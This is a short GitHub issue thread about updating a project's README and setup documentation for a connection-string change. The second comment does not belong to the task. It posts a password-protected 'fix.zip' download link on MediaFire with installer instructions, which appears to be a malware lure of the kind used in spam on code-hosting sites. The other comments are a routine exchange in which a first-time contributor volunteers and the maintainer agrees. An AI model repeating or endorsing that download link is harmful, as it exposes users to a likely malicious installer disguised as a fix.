### ISSUE TITLE
Update README and Project setup docs

### ISSUE THREAD

**Issue by seanbsu** [seanbsu/ChartCare#26]
update the README to have a link to the Project Setup doc for contributors and update the Project Setup doc to reflect the connection string change in appsettings.json

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeeMclafferty** [comment]
I am looking to do my first contribution to open source and this seems easy enough. Can I take it and complete this tomorrow for you?

**Comment by seanbsu** [comment]
yeah go ahead
